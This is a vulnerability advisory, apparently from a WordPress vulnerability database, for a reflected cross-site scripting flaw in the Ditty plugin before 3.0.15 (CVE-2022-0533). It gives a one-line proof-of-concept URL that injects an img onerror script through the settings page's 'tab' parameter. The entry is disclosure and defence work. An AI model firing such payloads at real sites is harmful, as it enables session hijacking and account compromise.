WordPress Plugin Vulnerabilities

Ditty (formerly Ditty News Ticker) < 3.0.15 - Reflected Cross-Site Scripting (XSS)

Description

The plugin is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.

Proof of Concept

http://127.0.0.1:8001/wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%281%29%3E

Affects Plugins

Plugin icon
ditty-news-ticker
Fixed in 3.0.15

References

CVE
CVE-2022-0533
URL
https://plugins.trac.wordpress.org/changeset/2675223/ditty-news-ticker

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
4.8 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
40f36692-c898-4441-ad24-2dc17856bd74

Timeline

Publicly Published
2022-02-09 (about 2 years ago)
Added
2022-02-09 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2024-04-25
Title
Newsletter Popup <= 1.2 - Admin+ Stored XSS
Published
2022-12-21
Title
Woo Products Widgets For Elementor < 1.0.8 - Contributor+ Stored XSS via Shortcode
Published
2023-04-19
Title
WP-dTree <= 4.4.5 - Admin+ Stored XSS
Published
2021-09-21
Title
St Daily Tip <= 4.7 - CSRF to Stored Cross-Site Scripting
Published
2021-08-16
Title
Language Bar Flags <= 1.0.8 - CSRF to Stored XSS